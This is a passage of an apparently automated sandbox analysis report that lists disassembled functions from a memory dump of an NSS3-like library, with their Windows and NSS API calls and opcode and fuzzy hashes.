Part of subcall function 6C5888D0: EnterCriticalSection.KERNEL32(?), ref: 6C58891A
Part of subcall function 6C5888D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C58894A
Part of subcall function 6C5888D0: calloc.MOZGLUE(00000001,6C59072D,00000000,00000000,00000000,?,6C590725,00000000,00000058), ref: 6C588959
Part of subcall function 6C5888D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C588993
Part of subcall function 6C5888D0: PR_Unlock.NSS3(?), ref: 6C5889AF

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: ffe2334eb523274b7b7af019ca725ad13cdf6ed433ed4c0a11ca09d79e684408
Instruction ID: 8d4e00e01b7b7d5a36c1768a8ddbd98e44c564fc7456b7b84ab55939fad093f2
Opcode Fuzzy Hash: ffe2334eb523274b7b7af019ca725ad13cdf6ed433ed4c0a11ca09d79e684408
Instruction Fuzzy Hash: 1A517170A06725DFDB00EF69C88466EBBF0BF44359F158929D8999BB10DB30E844CBD5

Function 6C689EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C689EC0
EnterCriticalSection.KERNEL32(?), ref: 6C689EF9
_PR_MD_UNLOCK.NSS3(?), ref: 6C689F73
EnterCriticalSection.KERNEL32(?), ref: 6C689FA5
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C689FCF
_PR_MD_UNLOCK.NSS3(?), ref: 6C689FF2
_PR_MD_UNLOCK.NSS3(?), ref: 6C68A01D

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: cfc5617ffd783d474afa59a7dbce6eacd81d7d6807209301ab692a4526c119e3
Instruction ID: e206f0debf96fa96c8f8ac5b12c9b5b1c5d74186f1f1d5ea15b1ab071176d4b3
Opcode Fuzzy Hash: cfc5617ffd783d474afa59a7dbce6eacd81d7d6807209301ab692a4526c119e3
Instruction Fuzzy Hash: D351CFB2801610DBCB109F25D88468AB7F0FF4531CF25896ADC5997B52EB31E885CFA9

Function 6C57DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C57DCFA

Part of subcall function 6C639DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C680A27), ref: 6C639DC6
Part of subcall function 6C639DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C680A27), ref: 6C639DD1

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C57DD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C57DD62
CERT_DestroyCertificate.NSS3(?), ref: 6C57DD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6C57DD81
CERT_RemoveCertListNode.NSS3(?), ref: 6C57DD8F

Part of subcall function 6C5906A0: TlsGetValue.KERNEL32 ref: 6C5906C2
Part of subcall function 6C5906A0: EnterCriticalSection.KERNEL32(?), ref: 6C5906D6
Part of subcall function 6C5906A0: PR_Unlock.NSS3 ref: 6C5906EB

CERT_DestroyCertificate.NSS3(?), ref: 6C57DD9E
CERT_DestroyCertificate.NSS3(?), ref: 6C57DDB7

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockValuestrcmp
String ID:
API String ID: 3535798206-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: b6d3e07cbee28bbe9339b3535d26506c85c1f1437011b53083996c9418fc405d
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: 3C218CB6E011299BDF219EA4DD409DEBBB4EF45218B180424EC18A7701F721ED94CBF2

Function 6C605F60 Relevance: 12.1, APIs: 8, Instructions: 64COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C60AADB,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C605F72

Part of subcall function 6C56ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C56ED8F
Part of subcall function 6C56ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C56ED9E
Part of subcall function 6C56ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C56EDA4

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C60AADB,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C605F8F
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C60AADB,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C605FCC
free.MOZGLUE(?,?,6C60AADB,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C605FD3
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C60AADB,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C605FF4
free.MOZGLUE(?,?,6C60AADB,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C605FFB
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C60AADB,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C606019
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C60AADB,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C606036

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalDeleteSection$DestroyMonitor$free
String ID:
API String ID: 227462623-0
Opcode ID: b30f7b4be3711fb090b1f5f6ee6ed8acd3151a5c97dac24db4f5b938ecad1052
Instruction ID: 1314df101f54a385a6ed51f42c93cf248347eff70629b3faa983f974a327f0c4
Opcode Fuzzy Hash: b30f7b4be3711fb090b1f5f6ee6ed8acd3151a5c97dac24db4f5b938ecad1052
Instruction Fuzzy Hash: 24214AF1605B01ABEB109F76DD48BD377B8AB41748F10082CE46AD7640EB77E518CB96

Function 6C680860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,6C687AE2,?,?,?,?,?,?,6C68798A), ref: 6C68086C

Part of subcall function 6C680930: EnterCriticalSection.KERNEL32(?,00000000,?,6C680C83), ref: 6C68094F
Part of subcall function 6C680930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C680C83), ref: 6C680974
Part of subcall function 6C680930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C680983
Part of subcall function 6C680930: _PR_MD_UNLOCK.NSS3(?,?,6C680C83), ref: 6C68099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C687AE2,?,?,?,?,?,?,6C68798A), ref: 6C68087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C687AE2,?,?,?,?,?,?,6C68798A), ref: 6C680892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C68798A), ref: 6C6808AA
free.MOZGLUE(?,00000000,00000000,?,?,6C687AE2,?,?,?,?,?,?,6C68798A), ref: 6C6808C7
free.MOZGLUE(?,00000000,00000000,?,?,6C687AE2,?,?,?,?,?,?,6C68798A), ref: 6C6808E9
free.MOZGLUE(?,6C687AE2,?,?,?,?,?,?,6C68798A), ref: 6C6808EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C687AE2,?,?,?,?,?,?,6C68798A), ref: 6C68090E

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: fa12dedec7964c5a578f1ec6416adf27e6cf1378fafb24e547a82f8c8e530844
Instruction ID: 45a8ec5595f19b280427f5c00b94a68b5dbbbdbb87ff9c40d40fb760413ce2e7
Opcode Fuzzy Hash: fa12dedec7964c5a578f1ec6416adf27e6cf1378fafb24e547a82f8c8e530844
Instruction Fuzzy Hash: DF1151F1B032805BFF00AB96D8D574A3778AB42368F1D0524E41657640DAB2F555CBEE

Function 6C573C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6C5E460B,?,?), ref: 6C573CA9
EnterCriticalSection.KERNEL32(?), ref: 6C573CB9
PL_HashTableLookup.NSS3(?), ref: 6C573CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6C573CD6
PR_Unlock.NSS3 ref: 6C573CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C573CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C573D03
PR_Unlock.NSS3 ref: 6C573D15

Part of subcall function 6C61DD70: TlsGetValue.KERNEL32 ref: 6C61DD8C
Part of subcall function 6C61DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C61DDB4

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: cc765e4c99fac1be2bed0e1b7dc1d6e409fd4c41fb8db67c6a035660af99a906
Instruction ID: 6d8132e7d583636e0b00a248d6e4fbd26fc0ab9aa78ea45e30b3c1c1b8d6af42
Opcode Fuzzy Hash: cc765e4c99fac1be2bed0e1b7dc1d6e409fd4c41fb8db67c6a035660af99a906
Instruction Fuzzy Hash: 44112C76E40114B7DB111B25EC458A67B78EB4226CF150130ED1843B11FB22DD9887E9

Function 6C579C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5911C0: PR_NewLock.NSS3 ref: 6C591216

free.MOZGLUE(?), ref: 6C579E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C579E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C579E4E
TlsGetValue.KERNEL32 ref: 6C579EA2

Part of subcall function 6C589500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C589546

EnterCriticalSection.KERNEL32(?), ref: 6C579EB6
PR_Unlock.NSS3 ref: 6C579ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C579F18

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: 1e58ccc65d89030f6454ae5e1fc15120e79dcd77a590474ee44f9ee014581bc4
Instruction ID: 65a9469ecb05da77fdb26ef51c56c0c4fdcf38adba5c19217607562f71cc5bb8
Opcode Fuzzy Hash: 1e58ccc65d89030f6454ae5e1fc15120e79dcd77a590474ee44f9ee014581bc4
Instruction Fuzzy Hash: F481F7B5A01601ABEB21DF34DC40AABB7A9BF85248F144528EC4987B51FB31ED94C7B1

Function 6C58DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C58AB10: DeleteCriticalSection.KERNEL32(D958E852,6C591397,5B5F5EC0,?,?,6C58B1EE,2404110F,?,?), ref: 6C58AB3C
Part of subcall function 6C58AB10: free.MOZGLUE(D958E836,?,6C58B1EE,2404110F,?,?), ref: 6C58AB49
Part of subcall function 6C58AB10: DeleteCriticalSection.KERNEL32(5D5E6C78), ref: 6C58AB5C
Part of subcall function 6C58AB10: free.MOZGLUE(5D5E6C6C), ref: 6C58AB63
Part of subcall function 6C58AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C58AB6F
Part of subcall function 6C58AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C58AB76

TlsGetValue.KERNEL32 ref: 6C58DCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6C58DD0E
PK11_IsFriendly.NSS3(?), ref: 6C58DD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C58DD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C58DE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C58DEA6
PR_Unlock.NSS3(?), ref: 6C58DF08

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: 970f432f644ed343476144c8c1aa27f933b1b57d525a1ddde08a0f2342eb15ac
Instruction ID: 0f281bac2697df586cd4a8dff95dfdf62ad6d7b520dbf3df771dffac052c3fee
Opcode Fuzzy Hash: 970f432f644ed343476144c8c1aa27f933b1b57d525a1ddde08a0f2342eb15ac
Instruction Fuzzy Hash: 8291A3B5A021169BEB00CF68CC81BAAB7F5FF94308F14402ADC199B741EB31ED55CBA1

Function 6C545FC0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6C62BB62,00000004,6C694CA4,?,?,00000000,?,?,6C5031DB), ref: 6C5460AB
sqlite3_config.NSS3(00000004,6C694CA4,6C62BB62,00000004,6C694CA4,?,?,00000000,?,?,6C5031DB), ref: 6C5460EB
sqlite3_config.NSS3(00000012,6C694CC4,?,?,6C62BB62,00000004,6C694CA4,?,?,00000000,?,?,6C5031DB), ref: 6C546122

Strings

misuse, xrefs: 6C54609F
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C546095
%s at line %d of [%.10s], xrefs: 6C5460A4

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_config$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 1634735548-648709467
Opcode ID: 5e62ba1fa4fc576243daa0054930debfeff6545610a5dfe08d07243bc88d0424
Instruction ID: 5d32949ae9856426f9445eb42fa8e26581d231348680c77efebadb8bbc0b4ee2
Opcode Fuzzy Hash: 5e62ba1fa4fc576243daa0054930debfeff6545610a5dfe08d07243bc88d0424
Instruction Fuzzy Hash: 53B14FB4F04646CFCB04CF59C6859A9B7F0BB1E304F058559D509AB362DB30AB94CB9A

Function 6C4F4F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4F4FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4F51BB

Strings

misuse, xrefs: 6C4F51AF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4F51A5
%s at line %d of [%.10s], xrefs: 6C4F51B4
unable to delete/modify user-function due to active statements, xrefs: 6C4F51DF

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: d56acfb85ed4d39bae4e13fd885163177157e1f48d1b105ed42450450fb28f0f
Instruction ID: e6062bc3a8512ef8c00d3aa2526f140f384e2f56647b7e93a843e3ce41395946
Opcode Fuzzy Hash: d56acfb85ed4d39bae4e13fd885163177157e1f48d1b105ed42450450fb28f0f
Instruction Fuzzy Hash: E771AD71A0420A9FEB00CE15CD80F9A77B5FF89359F148624FD299BB81D731E952CBA1

Function 6C5DFF10 Relevance: 10.7, APIs: 7, Instructions: 164memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,?,?,00000000,00000000,?,6C5DF165,?), ref: 6C5DFF4B
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,00000000,00000000,?,6C5DF165,?), ref: 6C5DFF6F
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C5DF165,?), ref: 6C5DFF81
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C5DF165,?), ref: 6C5DFF8D
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,?,?,00000000,00000000,?,6C5DF165,?), ref: 6C5DFFA3
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,6C5DF165,6C6A219C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5DFFC8
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,?,6C5DF165,?), ref: 6C5E00A6

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaArena_memset$EncodeFreeItem_
String ID:
API String ID: 204871323-0
Opcode ID: e30322a07619db2723ad9cf26e958ad4693f1563c14072c6b0270399d83dead7
Instruction ID: 7f2bef8a61833ab1508a63d566e08413eeac52c471d953156bae936e4a3c6f62
Opcode Fuzzy Hash: e30322a07619db2723ad9cf26e958ad4693f1563c14072c6b0270399d83dead7
Instruction Fuzzy Hash: E651D371E002569FDB108E9DCC807AEB7B6BB89318FA5022AD955A7B40D732AD00CBD1

Function 6C59DEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C59DF37
EnterCriticalSection.KERNEL32(?), ref: 6C59DF4B
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C59DF96
PR_SetError.NSS3(00000000,00000000), ref: 6C59E02B
PR_Unlock.NSS3(?), ref: 6C59E07E
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C59E090
PR_Unlock.NSS3(?), ref: 6C59E0AF

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Error$Unlock$CriticalEnterSectionValue
String ID:
API String ID: 4073542275-0
Opcode ID: 3ba273da91d3b3e446156a6fa864c6758d8812d7c4d81d0b591b525d298e65be
Instruction ID: 265e8b5e98b46ca494cffd34fef61d7cc81c367095b7adb796633da2db0a288a
Opcode Fuzzy Hash: 3ba273da91d3b3e446156a6fa864c6758d8812d7c4d81d0b591b525d298e65be
Instruction Fuzzy Hash: 0651CF31A00640DFEB20DF29DC85B6673B5FF45318F2049A8E85A47FA1E775E848CB92

Function 6C59BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C59BD1E

Part of subcall function 6C572F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C572F0A
Part of subcall function 6C572F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C572F1D

Part of subcall function 6C5B57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C57B41E,00000000,00000000,?,00000000,?,6C57B41E,00000000,00000000,00000001,?), ref: 6C5B57E0
Part of subcall function 6C5B57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C5B5843

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C59BD8C

Part of subcall function 6C5CFAB0: free.MOZGLUE(?,-00000001,?,?,6C56F673,00000000,00000000), ref: 6C5CFAC7

CERT_DestroyCertList.NSS3(00000000), ref: 6C59BD9B
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C59BDA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C59BE3A

